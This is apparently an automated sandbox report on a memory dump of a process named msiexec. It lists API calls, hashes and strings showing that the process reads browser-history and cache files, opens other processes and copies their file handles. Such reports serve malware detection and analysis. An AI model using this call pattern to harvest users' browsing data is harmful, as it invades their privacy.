                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                • String ID: "%s"
                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp
                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                • API String ID: 3354267031-2114579845
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
• memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• memset.MSVCRT ref: 00414C87
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProcVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 4182280571-2036018995
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                • String ID: }A
                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                APIs
                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d
                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: BINARY
                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
